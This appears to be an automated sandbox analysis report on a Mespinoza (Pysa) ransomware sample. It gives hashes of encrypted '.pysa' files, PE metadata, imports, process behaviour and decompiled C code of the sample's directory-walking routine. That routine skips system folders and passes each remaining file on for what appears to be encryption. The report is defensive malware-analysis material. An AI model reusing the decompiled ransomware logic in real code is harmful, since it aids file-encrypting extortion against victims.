                  SHA1:42233EC5FDC838F3317E35607A6A156CDEBDA6ED
                  SHA-256:A4B58D6069E0ED5043E96F9C1D0F7EA4855C1144076B6EC9421CA001833DC976
                  SHA-512:061B17122EDFC2D5CB0C8770B846C3112CCBB538AFCF2206128705D9108BDD20F3D0CE97C1FF2BE5B991B19D349DB0936A2A11EB3783D8D6D3C7027B16CB8FD9
                  Malicious:false
                  C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045724417012981
                  Encrypted:false
                  SSDEEP:48:gF0LZzTCf4s8CnKAVGcOAAv5T5pK76k+EmKhraeB8N1jUvso9sPMV+YSimIoPo:o+Jbs99VGOIz7EmKpaeB8HUT9QMj6IoA
                  MD5:3D5F42EB125A018E979CD9F3758303B2
                  SHA1:351B01EC7C3F34FA50511381909C6F88FBD4EC03
                  SHA-256:AD56F19A40F35AB5606ADF7F2926C7E9663D2A987CC96BC917039671CC9D54AD
                  SHA-512:8470D97DB55C51DC7589084866E2FF3564CCA6184646056F8EE04519E2C55C42BB425DA8D033B5984ACECB1F84CB74EC9DEFE5671C2D35DA5DE2C55A7710C6A0
                  Malicious:false
                  C:\Users\user\Downloads\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.060164470968638
                  Encrypted:false
                  SSDEEP:48:sgZcxqsRAUOA+psvnIdVLaq9BOXtdKkoy3PphX0oGD1KQapQG+SCTgPGN550t:/cb6UyVLNjOXtxPphkO8G+DTgPGG
                  MD5:9DCB0C29F5E63F2A34036A238A77DF50
                  SHA1:81AAD5B80E78150F1AB9C9E5E0446F4BD966D131
                  SHA-256:03A0D3297F8489DECDFD95765577FCFB39EC735EF1E0CCB34A4149ABE0F4216F
                  SHA-512:6686C889A7AF767C17BD763CD3C920A2B6CEF53492CE270D11B8A1B869A9703609FCE0A47B1DB6E82BE78BE6D356FD66AFA701A86C2010EBBB9C29DAEAC5F1ED
                  Malicious:false
                  C:\Users\user\Downloads\GAOBCVIQIJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.088720100204866
                  Encrypted:false
                  SSDEEP:48:fe++2Rf4aDOUZUx3yVWBtDyjjlFZUwa/Dm8vHtINvhTs3QWpbrafveaYpjd2M70R:W++ywjAS3ejjLZVk0vhQdNGxu2MQLlf
                  MD5:5FCF379866B00243D4FD729FD5E06720
                  SHA1:D66E67ECFF4714A40843D72D4A124DA537A2A2E3
                  SHA-256:3716392C1B2DF5939F7F72A05236ABA321DBFDFF9C6B6AB9C6082B471D30867E
                  SHA-512:78AFC669B1D7FC0018B3805D061D81F1932502E4A69C84589ED71EB43BAFF9BD80ED179FAEF84A67AF242E64794EA6B1DC89A84DADB3A9DF469A7E55695031D1
                  Malicious:false
                  C:\Users\user\Downloads\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0555455714407636
                  Encrypted:false
                  SSDEEP:48:nQpLlZkwLNwlBXY1bOQpgp83Q6dXS/60FUE+nJFrkJzswoPyVFjtNFzgSSiZ2ctB:IlqwLcKNLRFelcJkTnVFlzgSSiZ2c24Z
                  MD5:10338FE64063C1A5B22B6EEF5DFB4A4E
                  SHA1:BE04EEA31143F5797D9286D47E0E496B81BBF82D
                  SHA-256:9A9F8DA49F321CD8EBA1648F1C3EEFFEBF1BFDB10A317DEC1BEDC4A3D2BD3F3F
                  SHA-512:4469F54F19379930C985D1CED7937C0E5A16647CE793701856C606C919241B610838311E5980C58C4EFF1F7F54395DC12114AE79B5D00BE0237FC5CD63286DC6
                  Malicious:false
                  C:\Users\user\Downloads\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0634603739152215
                  Encrypted:false
                  SSDEEP:48:pximc+fgsLLrrpGUgNOR2KzrHBGOXbt/Q81KXrBxzdGSqIkhyS84iqfFg3D1DHG1:pxim7gg/U8R2KQOrHK7BxzdOF84iqy38
                  MD5:C6DC52AAF5B80D4E17B6970C4C8302A1
                  SHA1:03FE8F9E3A7A4FC661621AA8F169AFA35D819E4B
                  SHA-256:1416FE3339E57869C03D98B85F694464006BFC0EC201F1473AB71CDA7BD5B6D4
                  SHA-512:3D5EAAD05BB9922327C2978891674564DF076433F929796D841C7342176C40B254D46E87083F980E0ED0D4E1579D9842FE3FC528E94FE4842D84E2E9557892E2
                  Malicious:false
                  C:\Users\user\Downloads\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.059467926055534
                  Encrypted:false
                  SSDEEP:48:kKzpvpuvplDf0PaGH+pfswU9PGWG4PhBKZ/4a+mqZPdgfYqxQCOyPKcubuXUxvfa:lpv4lDcPlH+ps/9PDhBKZgtmeV+Yq/pZ
                  MD5:EBAD93517DCC81639036E2AA77BDB254
                  SHA1:1826A35BAAB26330559FF0BB9E5004456B9EA96E
                  SHA-256:2EB674BD717F4EA74F1CA6381E31BA913E11693DD97556288A1D4255A4A12861
                  SHA-512:F9691832B069CFBDFE69C178B538436EE61FCA84FB68CADDDB29DDCF82D5373EC8D7FB56EC10FC506753AB4AB7DD5C12B3A3AA134256417C194DA56F80C8E4DA
                  Malicious:false
                  C:\Users\user\Downloads\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0329710516782775
                  Encrypted:false
                  SSDEEP:48:04HxbZlZtNGewlc8O0w+6r3Skh0KhkaSUdUndsmrKXVe6OjDvRh7Za:xHdZf2ewlC9Skh04kJUd2d/WejR1Za
                  MD5:A7D9F034DE6E3FF28D2A2EF1C9EA7F92
                  SHA1:130964FB1B94A87F64332CE7654059207B127836
                  SHA-256:BF866FADECCBD66C60895C611E9F56AC0D090597435A43667B44F0A3E52A84F9
                  SHA-512:65E25827C89245995F051CC7236D413F18CB13610D2D36B0AF2CA37BE088CEC488CEE51B49076881932EF2202661B393CFA6C6B647F59EBBFE78BB43D1BDCD97
                  Malicious:false
                  C:\Users\user\Downloads\QCFWYSKMHA.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041800424888822
                  Encrypted:false
                  SSDEEP:48:wi+J9DDh3Ugn7tM2686p67lBFuj5ukRuJu/EFRXln5CvewBcRK93XbYYYZOrEXeb:tyD93p7a8eMwUkRukEFRXl5oewBcg9Hd
                  MD5:FD135663EDD4987E1CB40B8EAA5023F7
                  SHA1:7CFAC013D3048DB5D2797CCE44E2281D2D7579C0
                  SHA-256:580E3E2421ACE71AE836F52A2DA21D8060E194165941FE4AEF62FA9A990F1014
                  SHA-512:2AA5986181C6CBFC018C853FBEC353C4605472CAD0C8722EDF4EE00F8D3D6110EF654BBCBB69846801947DCCB08169A6C6245ED982E8D94A3EE93BFFA26AE04D
                  Malicious:false
                  C:\Users\user\Downloads\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.065408969582556
                  Encrypted:false
                  SSDEEP:48:ynxzSPmwouqiHQSQ7uA2RemMiMqD9qMXoV5trrFq1N57Z2lCZwxeWua05WY7oOSq:yQPh5HfQ7u3RZMi2HzRq1N5dQCSxeW45
                  MD5:AF665112B7ED19B37BA6967A856269E4
                  SHA1:297314020BED1A9C46BAD7919F39228FBBAF4EE8
                  SHA-256:0FAF9C18CF1FAC4F8545B23E460633766E34BBAD0DDE60614C22F002D180B1DC
                  SHA-512:4CFBF119D0496E4EF39281ACEB372BA39C5D6C9899CC352972B0B39AB7DFB88765C10868C15B77E5A1ACBF1F4EB86DF93FB2DA0F52A6C8B59F8D50912C90BDF4
                  Malicious:false
                  C:\Users\user\Downloads\QNCYCDFIJJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.038522212411196
                  Encrypted:false
                  SSDEEP:48:gyqxOCqnlFZ2kEYRh7ODitzl2QMi8azYNu2ePlzLDVgS2maHW9U5D:gyqc5nln0qhqD0R4aUNu2SzLDVgvpB5D
                  MD5:D41472DBEFA1398315B8D98792F25298
                  SHA1:07C82AF84DDC62FC540F18C3C60F3125EF819B99
                  SHA-256:68531BDF0181E055C71BC6B45215D2E7F60A1EE928C3700EDFBE3854DC187915
                  SHA-512:B57A56C4DF9BD252AC55439A413900B0C2E54C5D3C1AAEE90A46700C8D427FBED194DF00A09C368E597158CAB43DD34BF23ABDA618F29E4B1C6B01886D5B88EA
                  Malicious:false

                  Static File Info

                  General

                  File type:PE32 executable (console) Intel 80386, for MS Windows
                  Entropy (8bit):6.650740182139938
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:6hFKK8UQi7.exe
                  File size:511488
                  MD5:b6dd099b4c51edae5ea0c867ff2f12a7
                  SHA1:f13800d747ca3d79785f373af3ce098a0298a6d7
                  SHA256:f0939ebfda6b30a330a00c57497038a54da359e316e0d6e6e71871fd50fec16a
                  SHA512:5ada31af3f39f37fcd15b1afc3ab9f6e60fc47d56097130ac2c8ea734f1db1ce93d552014abeb71ab0235fa65d9ed7b2d9c5cd0367acf99df6d32f138cb3d8ec
                  SSDEEP:12288:kXwv9fG79H+OeO+OeNhBBhhBB+BRW3aHhIBipMbDH5sFUJ:iwv9+ZBRW3+hIIpETSU
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........$...w...w...w82#w...w82!w...w82 w...w...v...w...v...w...v...w..Aw...w...w...w...v...w..-w...w...v...wRich...w...............

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x432f39
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows cui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x5F4ACE62 [Sat Aug 29 21:53:38 2020 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:b5e8bd2552848bb7bf2f28228d014742

                  Entrypoint Preview

                  Instruction
                  call 00007FF194B6AD41h
                  jmp 00007FF194B6A24Ch
                  push ebp
                  mov ebp, esp
                  and dword ptr [00479F6Ch], 00000000h
                  sub esp, 28h
                  push ebx
                  xor ebx, ebx
                  inc ebx
                  or dword ptr [00475240h], ebx
                  push 0000000Ah
                  call 00007FF194B8C35Eh
                  test eax, eax
                  je 00007FF194B6A533h
                  and dword ptr [ebp-10h], 00000000h
                  xor eax, eax
                  or dword ptr [00475240h], 02h
                  xor ecx, ecx
                  push esi
                  push edi
                  mov dword ptr [00479F6Ch], ebx
                  lea edi, dword ptr [ebp-28h]
                  push ebx
                  cpuid
                  mov esi, ebx
                  pop ebx
                  mov dword ptr [edi], eax
                  mov dword ptr [edi+04h], esi
                  mov dword ptr [edi+08h], ecx
                  mov dword ptr [edi+0Ch], edx
                  mov eax, dword ptr [ebp-28h]
                  mov ecx, dword ptr [ebp-1Ch]
                  mov dword ptr [ebp-08h], eax
                  xor ecx, 49656E69h
                  mov eax, dword ptr [ebp-20h]
                  xor eax, 6C65746Eh
                  or ecx, eax
                  mov eax, dword ptr [ebp-24h]
                  push 00000001h
                  xor eax, 756E6547h
                  or ecx, eax
                  pop eax
                  push 00000000h
                  pop ecx
                  push ebx
                  cpuid
                  mov esi, ebx
                  pop ebx
                  mov dword ptr [edi], eax
                  mov dword ptr [edi+04h], esi
                  mov dword ptr [edi+08h], ecx
                  mov dword ptr [edi+0Ch], edx
                  jne 00007FF194B6A405h
                  mov eax, dword ptr [ebp-28h]
                  and eax, 0FFF3FF0h
                  cmp eax, 000106C0h
                  je 00007FF194B6A3E5h
                  cmp eax, 00020660h
                  je 00007FF194B6A3DEh
                  cmp eax, 00020670h
                  je 00007FF194B6A3D7h
                  cmp eax, 00030650h
                  je 00007FF194B6A3D0h
                  cmp eax, 00030660h
                  je 00007FF194B6A3C9h
                  cmp eax, 00030670h

                  Rich Headers

                  Programming Language:
                  • [RES] VS2015 UPD3 build 24213
                  • [IMP] VS2008 SP1 build 30729

                  Data Directories

                  Name                                  Virtual Address  Virtual Size  Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x73e2c          0x64          .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7d000          0x1e0         .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x7e000          0x604c        .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x6b0a0          0x38          .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x6b134          0x18          .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x6b0d8          0x40          .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x5a000          0x1a8         .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                  Sections

                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                  .text   0x1000           0x5816b       0x58200   False     0.480751329787   data       6.70762118964    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata  0x5a000          0x1a7b2       0x1a800   False     0.434376842571   data       5.28568891651    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data   0x75000          0x5a70        0x3800    False     0.188337053571   data       4.77578443016    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .gfids  0x7b000          0x1e0         0x200     False     0.5859375        data       3.71882974859    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .tls    0x7c000          0x9           0x200     False     0.033203125      data       0.0203931352361  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc   0x7d000          0x1e0         0x200     False     0.53125          data       4.71767883295    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc  0x7e000          0x604c        0x6200    False     0.620296556122   data       6.52543506605    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name         RVA      Size   Type                    Language  Country
                  RT_MANIFEST  0x7d060  0x17d  XML 1.0 document text   English   United States

                  Imports

                  DLL           Import
                  KERNEL32.dll  CreateFileA, GetFileAttributesExW, FindFirstFileW, FindNextFileW, ReleaseMutex, CreateMutexA, OpenMutexA, FreeConsole, HeapAlloc, HeapFree, GetProcessHeap, GetTempPathA, CreateThread, WaitForMultipleObjects, GetLastError, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, CreateFileW, ReadConsoleW, WriteConsoleW, GetDriveTypeW, GetModuleFileNameA, GetLogicalDriveStringsW, CloseHandle, FindClose, ExitProcess, WriteFile, SetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, SetEvent, ResetEvent, WaitForSingleObjectEx, InitializeSListHead, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, GetCurrentThreadId, InterlockedPushEntrySList, RaiseException, RtlUnwind, FreeLibrary, LoadLibraryExW, MoveFileExW, HeapReAlloc, GetModuleHandleExW, GetStdHandle, GetCommandLineA, GetCommandLineW, GetACP, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, SetFilePointerEx, HeapSize, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEndOfFile
                  USER32.dll    wsprintfW, wsprintfA
                  ADVAPI32.dll  CryptReleaseContext, CryptAcquireContextA, RegSetValueExA, RegOpenKeyExA, RegCloseKey, CryptGenRandom
                  SHELL32.dll   ShellExecuteA

                  Possible Origin

                  Language of compilation system  Country where language is spoken  Map
                  English                         United States

                  Network Behavior

                  No network behavior found

                  Code Manipulations

                  Statistics

                  CPU Usage


                  Memory Usage


                  Behavior


                  System Behavior

                  General

                  Start time:01:55:00
                  Start date:25/11/2020
                  Path:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\6hFKK8UQi7.exe'
                  Imagebase:0x13c0000
                  File size:511488 bytes
                  MD5 hash:B6DD099B4C51EDAE5EA0C867FF2F12A7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Mespinoza, Description: Yara detected Mespinoza ransomware, Source: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:01:55:00
                  Start date:25/11/2020
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:01:56:10
                  Start date:25/11/2020
                  Path:C:\Windows\System32\OpenWith.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                  Imagebase:0x7ff680270000
                  File size:111120 bytes
                  MD5 hash:D179D03728E95E040A889F760C1FC402
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Code Analysis


                    Executed Functions

                    C-Code - Quality: 91%
                    			E013C9500(intOrPtr _a4, signed int _a8) {
                    				signed int _v8;
                    				char _v2052;
                    				short _v2054;
                    				short _v2056;
                    				char _v4104;
                    				struct _WIN32_FIND_DATAW _v4696;
                    				intOrPtr _v4700;
                    				void* _v4704;
                    				WCHAR* _v4708;
                    				WCHAR* _v4712;
                    				WCHAR* _v4716;
                    				WCHAR* _v4720;
                    				WCHAR* _v4724;
                    				WCHAR* _v4728;
                    				WCHAR* _v4732;
                    				WCHAR* _v4736;
                    				void* __ebp;
                    				signed int _t56;
                    				void* _t66;
                    				signed int _t69;
                    				signed int _t70;
                    				int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				intOrPtr _t80;
                    				signed int _t84;
                    				signed int _t85;
                    				signed int _t87;
                    				void* _t93;
                    				void* _t95;
                    				void* _t97;
                    				void* _t98;
                    				intOrPtr _t99;
                    				signed int _t102;
                    				void* _t104;
                    				intOrPtr* _t107;
                    				intOrPtr* _t110;
                    				intOrPtr* _t113;
                    				intOrPtr* _t128;
                    				void* _t130;
                    				void* _t131;
                    				signed int _t132;
                    				intOrPtr _t133;
                    				intOrPtr _t134;
                    				void* _t136;
                    				void* _t138;
                    				signed int _t140;
                    				void* _t142;
                    				intOrPtr* _t143;
                    				signed int _t144;
                    				void* _t145;
                    				intOrPtr* _t146;
                    
                    				E013F2860();
                    				_t56 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t56 ^ _t144;
                    				_v4736 = L":\\Windows\\";
                    				_v4732 = L"\\Boot\\";
                    				_v4728 = L"\\BOOTSECT";
                    				_v4724 = L"\\pagefile";
                    				_v4720 = L"\\System Volume Information\\";
                    				_v4716 = L"bootmgr";
                    				_v4712 = L"\\Recovery";
                    				_v4708 = L"\\Microsoft";
                    				E013FF144( &_v4104, 0x400, _a4);
                    				wsprintfW( &_v2056, L"%s\\*.*",  &_v4104);
                    				_t146 = _t145 + 0x18;
                    				_t66 = FindFirstFileW( &_v2056,  &_v4696); // executed
                    				_t136 = _t66;
                    				_v4704 = _t136;
                    				if(_t136 == 0xffffffff) {
                    					L41:
                    					return E013F268B(0, _v8 ^ _t144);
                    				}
                    				_t102 = _a8;
                    				_t140 = 0;
                    				_v4700 = 0;
                    				do {
                    					_t107 = ".";
                    					_t69 =  &(_v4696.cFileName);
                    					while(1) {
                    						_t130 =  *_t69;
                    						if(_t130 !=  *_t107) {
                    							break;
                    						}
                    						if(_t130 == 0) {
                    							L7:
                    							_t70 = _t140;
                    							L9:
                    							if(_t70 == 0) {
                    								goto L39;
                    							}
                    							_t110 = L"..";
                    							_t74 =  &(_v4696.cFileName);
                    							while(1) {
                    								_t131 =  *_t74;
                    								if(_t131 !=  *_t110) {
                    									break;
                    								}
                    								if(_t131 == 0) {
                    									L15:
                    									_t75 = _t140;
                    									L17:
                    									if(_t75 == 0) {
                    										goto L39;
                    									}
                    									wsprintfW( &_v2056, L"%s\\%s",  &_v4104,  &(_v4696.cFileName));
                    									_t113 =  &_v2056;
                    									_t146 = _t146 + 0x10;
                    									_t132 = _t113 + 2;
                    									do {
                    										_t80 =  *_t113;
                    										_t113 = _t113 + 2;
                    									} while (_t80 != _t140);
                    									_t116 = (_t113 - _t132 >> 1) - 1;
                    									if(_t116 <= 2) {
                    										L29:
                    										if(_v2056 != 0x43 || _v2054 != 0x3a) {
                    											L35:
                    											if((_v4696.dwFileAttributes & 0x00000010) == 0) {
                    												_t142 = E013C8EBF( &_v2056);
                    												 *_t146 = L"*.*";
                    												_push( &_v2056);
                    												_t84 = E013F5BC8(_t116);
                    												__eflags = _t84;
                    												if(_t84 != 0) {
                    													goto L38;
                    												}
                    												_t85 = E013C9066(_t142, _t102);
                    												__eflags = _t85;
                    												if(_t85 == 0) {
                    													goto L38;
                    												}
                    												_t87 = E013C8EE5( &_v2056);
                    												_t140 = 0;
                    												_pop(1);
                    												__eflags = _t132;
                    												if(__eflags < 0) {
                    													goto L39;
                    												}
                    												if(__eflags > 0) {
                    													L50:
                    													__eflags = _t102;
                    													if(_t102 == 0) {
                    														L52:
                    														_push(_t132);
                    														_push(_t87);
                    														_push( &_v2056); // executed
                    														E013C67F8(1, _t132); // executed
                    														_t146 = _t146 + 0xc;
                    														goto L39;
                    													}
                    													L51:
                    													__eflags = _t102 - 1;
                    													if(_t102 != 1) {
                    														goto L39;
                    													}
                    													goto L52;
                    												}
                    												__eflags = _t87;
                    												if(_t87 <= 0) {
                    													goto L39;
                    												}
                    												__eflags = _t132;
                    												if(__eflags < 0) {
                    													goto L51;
                    												}
                    												if(__eflags > 0) {
                    													goto L50;
                    												}
                    												__eflags = _t87 - 0x400;
                    												if(_t87 <= 0x400) {
                    													goto L51;
                    												}
                    												goto L50;
                    											}
                    											E013C9500( &_v2056, _t102); // executed
                    											if(_t102 > 0) {
                    												E013C9F85(_t132,  &_v2056); // executed
                    											}
                    											goto L38;
                    										} else {
                    											_t93 = 0x5c;
                    											if(_v2052 != _t93) {
                    												goto L35;
                    											} else {
                    												goto L32;
                    											}
                    											do {
                    												L32:
                    												_push( *((intOrPtr*)(_t144 + _t140 * 4 - 0x127c)));
                    												_push( &_v2056);
                    												_t95 = E013F5BC8(_t116);
                    												_pop(_t116);
                    												if(_t95 == 0) {
                    													goto L34;
                    												}
                    												_push(L"SQL");
                    												_push( &_v2056);
                    												_t97 = E013F5BC8(_t116);
                    												_pop(_t116);
                    												if(_t97 == 0) {
                    													L38:
                    													_t140 = 0;
                    													goto L39;
                    												}
                    												L34:
                    												_t140 = _t140 + 1;
                    											} while (_t140 < 8);
                    											goto L35;
                    										}
                    									}
                    									_t143 =  &_v2052;
                    									_t138 = _t116 - 2;
                    									_t98 = 0x5c;
                    									do {
                    										if( *_t143 != _t98) {
                    											goto L27;
                    										}
                    										_t132 = _t143 + 2;
                    										if( *_t132 != _t98) {
                    											goto L27;
                    										}
                    										_t128 = _t143;
                    										_t104 = _t128 + 2;
                    										do {
                    											_t99 =  *_t128;
                    											_t128 = _t128 + 2;
                    										} while (_t99 != _v4700);
                    										_t116 = _t128 - _t104 >> 1;
                    										E013FF144(_t143, _t128 - _t104 >> 1, _t132);
                    										_t146 = _t146 + 0xc;
                    										_t98 = 0x5c;
                    										L27:
                    										_t143 = _t143 + 2;
                    										_t138 = _t138 - 1;
                    									} while (_t138 != 0);
                    									_t102 = _a8;
                    									_t140 = 0;
                    									_t136 = _v4704;
                    									goto L29;
                    								}
                    								_t133 =  *((intOrPtr*)(_t74 + 2));
                    								_t24 = _t110 + 2; // 0x2e
                    								if(_t133 !=  *_t24) {
                    									break;
                    								}
                    								_t74 = _t74 + 4;
                    								_t110 = _t110 + 4;
                    								if(_t133 != 0) {
                    									continue;
                    								}
                    								goto L15;
                    							}
                    							asm("sbb eax, eax");
                    							_t75 = _t74 | 1;
                    							__eflags = _t75;
                    							goto L17;
                    						}
                    						_t134 =  *((intOrPtr*)(_t69 + 2));
                    						_t21 = _t107 + 2; // 0x2e0000
                    						if(_t134 !=  *_t21) {
                    							break;
                    						}
                    						_t69 = _t69 + 4;
                    						_t107 = _t107 + 4;
                    						if(_t134 != 0) {
                    							continue;
                    						}
                    						goto L7;
                    					}
                    					asm("sbb eax, eax");
                    					_t70 = _t69 | 1;
                    					__eflags = _t70;
                    					goto L9;
                    					L39:
                    					_t72 = FindNextFileW(_t136,  &_v4696); // executed
                    				} while (_t72 != 0);
                    				FindClose(_t136); // executed
                    				goto L41;
                    			}
























































                    APIs
                    • wsprintfW.USER32(?,%s\*.*,?,?,00000400), ref: 013C9590
                    • FindFirstFileW.KERNEL32(?,?), ref: 013C95A7
                    • wsprintfW.USER32(?,%s\%s,?,?), ref: 013C9665
                    • _wcsstr.LIBVCRUNTIME ref: 013C970C
                    • _wcsstr.LIBVCRUNTIME ref: 013C9723
                    • FindNextFileW.KERNEL32(00000000,?), ref: 013C9768
                    • FindClose.KERNEL32(00000000), ref: 013C9777
                    • _wcsstr.LIBVCRUNTIME ref: 013C97A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Find_wcsstr$Filewsprintf$CloseFirstNext
                    • String ID: %s\%s$%s\*.*$:$C$SQL
                    • API String ID: 2716949753-2032610380
                    • Opcode ID: 6a7ec3b41efa2a9cb4ea82847bc0fd5171db64c73b4a89e2e92ec799825bdf65
                    • Instruction ID: 81f8fff7b9c7318c888452db7f36784e2fb5eea72ccb18552741e1c390e279c5
